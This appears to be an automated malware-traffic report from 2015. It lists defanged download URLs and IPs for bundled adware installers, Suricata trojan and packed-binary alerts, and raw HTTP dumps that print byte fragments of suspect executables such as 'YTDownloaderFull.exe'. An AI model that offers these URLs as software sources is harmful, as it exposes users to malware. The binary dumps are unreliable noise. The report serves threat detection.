CJE/NAFMRO0hJ42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0JzvOmbeJDXy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://dl.maxdevzone.com/spdbt/shoppy/snsch7.exe_c 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOcXM978RrvxgTxIUcsgQ w0eteH8KxBtakHX utQO2t7GJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF1B5eyhynK5il gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=c0XmKevqA0lENRlsCDLYcGeakDLP0HwkgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEdPIgADxit2gnbJKYwPfuhCWcSucRpHa5xQC drCF7eFc68xQtOPoFeZZ3F95gs6nEVdjbbwQnHyVtB8erRBUENoBUzXpAW/ CSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://dl.ourinputinfonet.com/web/gf/all/setup.exe 69.16.175.10
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKtK2nLIJE3nATxIUcsgQ witsIrAYx7ljhVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACe dC6ehZq jU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOfXhYbE9Wm3iuFUsM2slALjgb6v7cXpPvvDUPlfCzRdlPqkO/QXEWVboHDCUOFdfNUw yx3IACsY0 /eJ8LmRXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://errors.maxdevzone.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1439464836 54.231.48.42
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_b 69.16.175.42
hxxp://dl.maxdevzone.com/spdbt/shoppy/snsch7.exe_a 69.16.175.42
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_d 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB/8e7kw1yV54DHh RP9FBwluXtX58AbVGLqY0nw4ErLtxha/ J3llgZ187AT1rhu GGW2I O4PkTUw1aLHDaMdxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovfwqbgkyABd 198.232.124.192
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC2zsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== 198.232.124.192


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Executable served from Amazon S3
ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN out of window

Traffic

GET /utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=15000&rnd=20529 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:32 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
inx/1.6.0..Date: Thu, 13 Aug 2015 11:19:32 GMT..Content-Type: image/gi
f..Content-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT..C
onnection: close..GIF89a.............!.......,...........L..;..



GET /utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15890&rnd=20529 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:32 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /web/gf/all/setup.exe_b HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433372"
Last-Modified: Thu, 13 Aug 2015 02:36:12 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds045.am4.c
....1..U\.z e....b..'.L-ek..Q2.S.......L EW.O.T..?.....V.yO|g.{LD..U..
....7>.2e0.....9...I.S..5.(....d_1.I.. .....{.1'....O..a..._...a%..
.#S.)t!x..s........P.....K:....<p....|.gpU.7_[[email protected](......
@...C....{.#.)8.}.&Or.....=0.{.....i\...Gf.h......b%K~i.....E.....cib~
...7D....._.S....?=..g}}.6v~..'i.>.......9O..=K.....)..C&..W.>u9
.q.~.2.s6....Vr......_...... M. _..*(5%cv.j..T......X....I.`G..@.[..w!
..5.W.a..*."..%R.S.TC....V.$....V.j....2...*....#.e.....S}...f.....J.H
..... ..N..a8..sk...N0\..^y...=..........!\..F.a._.J./.Q..<.PuV9^.j
...._.....<..Y....d.....?%]..^z.J.I..,.|>S...z.06#n..-.{m8....&g
t;....B.....&...r.(.34......}x.. ..&.....<C..U.j....j...$..tQ......
i.fj..y.m$.}.pLv.......n...u.>i 4.d.o<.~u;........B<.F.F.....
........_.9....8Xf..&.......rm.kHg.......a.v....S....dT...m....d.....4
i.g........G..0...R.....[[email protected]..#......[.DF.5..}w!...o..h^.<
......g./.\soh...?f.S~....r./..P.......x.).[.:...x..._roH...G.Y...e.-Z
.$..?......f....B...B.#..........r....n.2.6..&JhDd.x.M.f5.Y\...0...|..
.<7g....3 ......Ih...".X.........e.dwalN.{.i.be"7C0H.........l.....
. ".Y...r{.U......k.....G.K...=.eU.........RE..fl..0x..;.....GO..Y./..
J.._...j..<J....w;.....u.......<;...Q4ThE.e........r....9.@.....
...5........L....ch........-.'%|d.D...1.?h.mY...X.!;.}....Vi..........
.2.%...E. ._F.>2..3.{.$k....yW...z?.......Q3B....7..S.Q..=..#...RQ.
....9...\?s...S..m................c0Z....y..".|:.A.6E..~.0t>.B....i
b|..#.I.)8...;...g...f..........[:.R...4.N.G........ly._D. .*f...r
<<< skipped >>>


GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 0-249999/7202623
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/7202623
.....:...`.........E)..=....;P./.f........IMn.. ...>ew....&.n.Y.xv.
.'.D......O...r.<{1x2...d &.R...8....s.^...|.=...3..eS.....L......H
...0E.7.........PT.]R.F.......'.Y$......^..Y...%.8...z6....g.......0.9
)...`0}..x:B../.2.$,......i...3./h..h..m.(..R........4Z.*... .n...[...
;..\.....}..E.G.~...-V...[..82n=...........7<.,..E.>.il.D1.....e
...c.....&...B...!X[.....(....g..}.h.{..J..m.....x.(.\.6.. H.........@
....V...h..k.....P@[i1.\_c>.L2.c...A...h.m..b.?.^k.....EH.?...tE>
;J...O9.......-..n.......n.X..-}.....,6.j.z.(.......J..........Q.z..{.
...qV.....=...].8....I......m....H.S.K........)..R{D."g..;...;...w....
O.?0..b..$...;0.;.e.cC)..r{XD.J..;S...q_........=Eo...2...P.-r...Z.Xd.
]..fz.......xu...l.< ..<6:9/].....EpG..e ...\.L....u.(Y.... .6..
.l..RH ...(u~.....h..Ki.M....=....Y..`.1.......R..k.M...M..........%f.
8`8..7.E.p....C.i0.".p..1.:[email protected].\......;Xpy..
G.{...........*..#&.....Z.....q..x8Y..y".VOY|......L..K.`...b.w......V
C.... wG.}..m...-Y.mf... 65.3.[...d0h..#%8;.7..r....I!.N.nX..t.C.....'
..TS..o#db]\Y..(..x.&..._.:S.,'...LW...D[..B ].......hC{q9!.[.qc....b.
9...9H..Q~.A76....,y.].Q...^.2...}......1...LD..P.7.....f!.....yG.w...
/h...?b..v.p..x.K{...%.u.SI......}...^]}...4..Gl..]..<l.....!...I^}
[email protected]..%..V...... Y.A........U5._.T.).....pN._.."...kt
......l.N&......m...{........:'[_....4.x-.^.x...j..r>.....a:.!.W...
..Q.J..#...n..xoB..A>b../Z..7}..w$.Q.f.9nv..p<.....iZ...xw..k.j.
.o=...-M..B....]..A......HrH...9...6...}6."t...';.,.c.r.QB...w.zF.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1000000-1249999/7202623
Pfp./.}KQ..P....A....>.?#S.......e.) B.O....ys.....f.z....7B.)x15..
h...s{'...I...f.u....l....%Q....&V.cJl.-s|F....#~..y.|........y.......
4....i.jtz.<y...."$gb.......Vq.}.Y.!.c;..z7..z......[......([..)..o
....v!...Y..A.{.../.T..-.6.z01.q...S5N'........8a&..ZSeRj...)eg.n.KqFz
|7......EU..>LGSN..K.I4rR..n:Pbw"..(....-M..>..5.7..E.v.N...Yd|Z
.\g$........Q.7..Y......Y....,...g.|:/....1fF".C..G:.U....X,..<.Z..
..Z.1.....J....=.w..c...9..H...\.....j9..t.Z..;>...TS)....../.L...v
..%......'W..8...$.....F.....7,.LI\.h..........V.p...*.N.3....c.......
.......[L..qY.......M\...4.. k.K....3rl].b.Md...9../|roI.....Ni..1....
c......./....uU%..\;.`.....0....9C......6........C|f.`..!...O.}..zV.G{
.{.f.nTy..(..o.Xf...h..q.q9NZ..........E.C.E..........T'"T8..f...o....
9...r.J......:v..E...=.M8?g9...tL#.@.....`.....PylX..._.Pb.FhU9...r.^.
.F..X.......WN.....). Z.A...a...N.W..d$...S.wn1.`.e.....P..U..$.DQ2.Q.
.P..$7..i.....}.h.....H.F=.6......,VqW..I3}wadJ.%.b.LD.h....WQ..vN....
h..<..[..dU)..N.....M2Y..i.o.O......3.%...<! .W...1".\!.)....m.c
"" 2x=.A.......-.R.o3.p.......[.......;..... .J....Y...~.CO<.$.`...
...g..%p.L..P..g....7..=|/...!a.....n.........eM. .[.-.8O....< .;..
[email protected][email protected]).{%......_.MK....p..6......
?.u..}..HB...j...9.....r...I4Ap..k.2V.o...4......q....G.2Mz.}.........
N\R. .a.....l3....qX..Jl.n..Jz..*i..`........K.h.......(..)..H..../...
[email protected]\.EV.<<g....p..H..t...>Q6......{_X..V........
<.3.|..G3....8..|..xT*:,.....P.....V..'...`.!.....8*....t]:...i
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1500000-1749999/7202623
.9.e....4...]....2...........P... ..L...*.........>y,.?9 ..:.{.>
BC#................|..Df.7........y.)..._.P.l-|,...F..@.#w........$?N.
:.ca*.Z.......Z...*0.e..............hV.uf!.....m6.S....b.I...(....2.T.
..b.A.G[...m.i{S.I3.....U.j...'..".O.ht...yF.cK6q..W.n?:.&...G.....i%.
oU^$N....jF7....5^4h..O.3..RT.o@&.WY.VI_j.[C%.......raQ..%r....1.\=.t.
...]`s.n2....x..B..u..?.1.W..<.r.h...}...:...;....ij....I.G.^....)&
gt;.......p.'R~V....Gac.........U......z.u6.r>..un...KO.....yi.-...
..T.l........ `c..49..R......L..Y....8.....r....O..... .....*E...z...5
.....B..D"Q...#..(x.L...i_......R4....CQ.L`..e.}.@.<.v<.\)....t.
.^_./..=T6....]..o,R....Uw_-64x=J........#[email protected]...>C7.}.....
<2.r-....v.c] ./B.?.....p....=R.......(EQ?........9[.%...... e.V.iS
....}q..I......5...q. `...(...v...\..@!.............B.r.Z..JR. #...7.d
...WG.c...*.y..T...tk .dn_.......It.T~1...../.....6...?.B_.3.........`
([email protected].)....F..>W..Cc.8>..-..i.N....T.w...v a.#.......k.
y1W..K..._.mi.b!.a........W.~I..Hje.9.2..@j6?.F1)!...c ...).s.ue..M..#
_..a.......M..9.|>F.as........Bd R.e...;.S.4.I.......K......i..35:.
=.....i...Q,.t....{.v.E$.Z...b.....Vk.uI...u..H}.J.....0}......2.....:
j\./...d.X.h.C.S...].....N...v.1..Y...O.....D.j..T..t.^....G?.=...3...
d@_....q...{;.;..b{yD.....k..n?. ...`.. ...W.:..........O....g....8.d.
.&.^P.}.....1......Qw.x...o`[email protected]'....VjY....;...`.!0Y........6....
.......M!..p....VH.....T...L....#..fS..c.....w...p.H.T*v...v&.Y.......
..g....0u.....\'....*[email protected]\.T."..(.6.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2500000-2749999/7202623
.2A.{j8.H..1..Cw.)_@..]...&.OsU....EP....8...0...........w...$..!.&. .
M....laA..........J.> @;_.G. ..5..{x.].N.......{j.6.\..T.T.n.......
[email protected].:..6!..h.iR..Kl]6..S..h.F..^...*.E.....
.Ed<C.2.j..x1oO....Y..0.$.[....d.*.a..Q....g?.v.l".....N.S}ep..:u&l
t;.4)A...w>.......qB...e.%.........I..l 3...../Lr1.tf.^8.)...:....`
.Na!..k.w....rqo...S.e.G..s50.......a...s.x..e.0!...... ...H.t#..{..N9
.e.....J....f{.,.......K....".xQqA.lS..9....WLl3.S'....m./z.......&...
~p ..T.!....&9.u.-\....$.-. @...Ejr.~...[.$t.Zm.O_CU...`..A'`...Ry....
..,T.a...4..y...^...l*........T..F.b..v.....a./5.l..u8.o.#..*......L-.
.c93dY......`......%O3...:.I.."[email protected]..).U.{].l
...O..w.!-.K......E.N=u.hs........t.....[.4.._!Z .....unH.O......OS..U
....W|.9.[..-.?....U.K.H.........Y...c....UQ..p......5.....|.4.{..4...
./.....n.N../.l.....I..Mc.w..........,..>.=.%k..Z..R..q.4#>.....
s..R..xv..=.(j.cYz...}..=.t.........5..o...}..k.U......9.?..2.........
.>..........!.z\....t.!v.g_.&.!...].:....G..T.....K....h.a...3"....
.!.}[email protected]&....Va..W..kAR(......`|Ca.nY9l.}..
.jH...&..........I.4,KA...R%..o.2)....o....Ke.)9.!....$.a.BD..K6o.5.H.
)..>..-H.'`.....*.J..Q......So.p...3.. .4.V8...n.<.*D.BK.".33...
t.X:.....i.....|?t.T..`....n..K[.(...}.mG-h...p...Y...}....u.....o.mJ.
..ql.C.t..(...F..'.}.>y..~...6\P.K&..cS{....C........A.lxk...,QS8.O
....k...i...`.S.U.Z..;..H5......{~.x?8..jS.2Z......E.0v....B.O.l.9....
. .L.-MV.">.B....p....'o.;.v.Gb..g..../../....w.....[.".. .6Bj.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3000000-3249999/7202623
8Be.KLe#"........O.....z.b.D.....,.s........r.s..G.....(..q....f .._*.
......m.Ee.....$.k....%U)..Z<u../..~k......{.#.).U.h2...H'......h.E
.Yd....z.>/>...)DI...._./Y{.)IK}hJ.E.n.h6..;.#.w.HI7...O....3..}
hP.d[...!.D...H.N.ek.V>.R..9....(^....A.S..t>..D.....".8....{eS.
Y.....c.SgQE....b2....D....W.....0V..t..\.....=..i..y..%.gI........B*9
>.....#.:.....$X._..U9...?R....Fx.Ay.:D...q.p.].k..O.........-...$m
HF..r .@..!C-..%.,&=.9.a.e*.G....o.$..GB... ?{..}..C.._s.?....j..d...X
.R......t.t.....W..a./..b?.1 z`P.b#. A.kc.....:./bu....Z1.M..........$
.0.:.#...9....Ng..)p[..=.....}.?,....| [.@8..$.R.j..C..O..H....5W...R?
....M....<..8 .Ek.W..Lr....X....}.e...r..G..{...b*..]....Q.......x.
[email protected].>!.G.c...,..).LT.:N.]"L`x_eC.0.M...o.p=... ...t.
p...u0?.<..i0m6...O\....;`,.F...o.%/..;.vE..'.<f..?.: .....KyNAe
....m.92...H@H{...I$#W....K3.c......[`.u.9..\_..>.L..G.brC...s.!.U.
a..'.'.@.......>[email protected]<0.-B...N.._....~\@.a.tN:.....b...
.-M.O.W..s..~.q6y..Y.e.O.%..&...8R.=......N....<..]....:...^t......
=~.....m."......\.$..G?|.d?..2.U.#..L...6.<k..sZ ..d.....@'!....(_~
..$$..nJJ.ef.....#.W...Ca..1..)8....!.....u}.z...jo=...x.`....g.......
C.J..Lt.n...vhm.)...n..........M...20.znc...q..l\Q.........5.3...;.v..
...^.).%.<.QUK_.I..f"[[email protected]&2k.`....e7kM;.>{Q.....p#^.B.
fK7k`F...Pe...1a.....#.M.>i...o..Yp;....~..5..0!......F.o.....?.9.,
...T..^...G"..lh8..Z......[u.Q.L.......9....$..)......g..._....IA~.i.S
4pf. .J....P. ..D...U..1......!..G..[..9...&DA.*..[........*.|..&.
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3500000-3749999/7202623
.O[.u.Jf,.......*."..% ..F...W!..(...V<.Nt...m....8....__....`..:..
7.(0h.z.^Y(...I.Y.C{{>.5....0*)Xi..Jr.....y.."<...r3..u)..QE.W..
;k.e-....K.%.6...w Eg........ .{.".......c./..P.hW.....A.E...=...u*.Lj
.=..V..=Or.....}....~.CS...BZ.q.....u].....a.Sk.........:j... A.q`....
..z......5...(...(....q.b.A..0.....fJ...BGH.;rt|(.......;X.Z.r.C...u.l
.......f{..^.06..._..."j...X..Sl.E0.G."..`.....b.F.)...$Y..u4..,..O..k
Cr..s.%..'.$.FrN....-!.b......M.b.B....5 ..>..e..&..]#.P..vqQ..Q^n.
".7g..d[d..o.......[.&...Zl.3...-.Y.".tn......h....1~...5.&f.edH.:~. .
..P.. ....9...~9...=b......}.G"^#y.Q.m.....VqB\..G.h....f.A.....}Gy]N.
5D......A].y...]..)s[ ..i.y *..GKX.K...E..<hV.[ht,.&>..9..... .{
.Z...... .]rcO;<.s.E....Q2..'._..(V........ .....<.-..c...J.....
v _.....m.1..3.e....||=D....E.yN.6....Q4.|.......;.p.7...{....g...x...
..i.K`kG9.27. !y{....r.6d...}...'=.W....>.m._...K..9|.^...'..j.s...
I...T..........FRE...`.T.`......59.4.%f..........I...>...<.j....
na.zu...i..a.!...3z....S.kO.....K.:.c.....dAH.E...w^.?.(.n?..?(./]...B
0.....y../....ry..i>.......p....W\..YD..cx..Xk3...d.j(.5..?.,\r....
x......W..=..^*.T... kv..*.Qc.,.S*...uiD0$.r.}.;\.xp.OM...$..{=..HR.w.
0..`.M...N....56..]..7cT}{HPN.w....E.`......EFyO....A/U.>&_...d.8$5
..cP)..x...~....7.5..w54....g.....L.......sm...?3o<..s...W..,V.W...
...,..D#a..4.O6..Ia........M.......v...)>.D.O..g)/.."** ..E.D....N.
9.H3..bF.....'Y..k........b......x..........S=F.myMQ.j.s..............
..a.g>]s.7...Xh...V.5....S.M...a".......e.Cz..x^...4o".r.A..Q.M
<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1


Range: bytes=4000000-4249999
